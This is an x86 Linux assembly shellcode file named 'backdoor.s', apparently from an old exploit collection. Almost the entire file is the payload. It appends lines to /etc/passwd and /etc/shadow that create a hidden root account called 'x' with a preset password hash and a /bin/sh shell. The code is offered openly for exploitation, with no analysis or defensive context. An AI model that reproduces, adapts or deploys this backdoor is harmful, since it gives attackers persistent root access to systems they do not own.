[SC] backdoor.s : 2006-11-30
.globl main
main:
jmp ONE
TWO:
# To /etc/passwd
#open
popl %ebx
xorl %eax, %eax
movb %al, 11(%ebx)
movb $0x0a, 33(%ebx)
movb %al, 34(%ebx)
movb %al, 46(%ebx)
movb $0x0a, 91(%ebx)
movb %al, 92(%ebx)
movb $0x5, %al
xorl %ecx, %ecx
inc %ecx
int $0x80
add $12, %ebx
movl %ebx, %esi
movl %eax, %ebx
xorl %ecx, %ecx
xorl %edx, %edx
inc %edx
inc %edx
xorl %eax, %eax
movb $19, %al
int $0x80
#write
xorl %eax, %eax
movb $0x4, %al
movl %esi, %ecx
movb $22, %dl
int $0x80
#close
movb $0x6, %al
int $0x80
movl %ecx, %ebx
add $23, %ebx
# To /etc/shadow
#open
movb $0x5, %al
xorl %ecx, %ecx
inc %ecx
int $0x80
add $12, %ebx
movl %ebx, %esi
movl %eax, %ebx
xorl %ecx, %ecx
xorl %edx, %edx
inc %edx
inc %edx
xorl %eax, %eax
movb $19, %al
int $0x80
#write
xorl %eax, %eax
movb $0x4, %al
movl %esi, %ecx
movb $45, %dl
int $0x80
#close
movb $0x6, %al
int $0x80
#exit
xorl %eax, %eax
movb $0x1, %al
xorl %ebx, %ebx
int $0x80
ONE:
call TWO
.string "/etc/passwd_x:x:0:0::/etc:/bin/sh__/etc/shadow_x:$1$N9rTnvmD$Z.e92/gt.SqCmUyyxHI6A0:1::::::"
Copyleft (C) 2007 Len. All Rights Not Reserved.
Note of Exploiting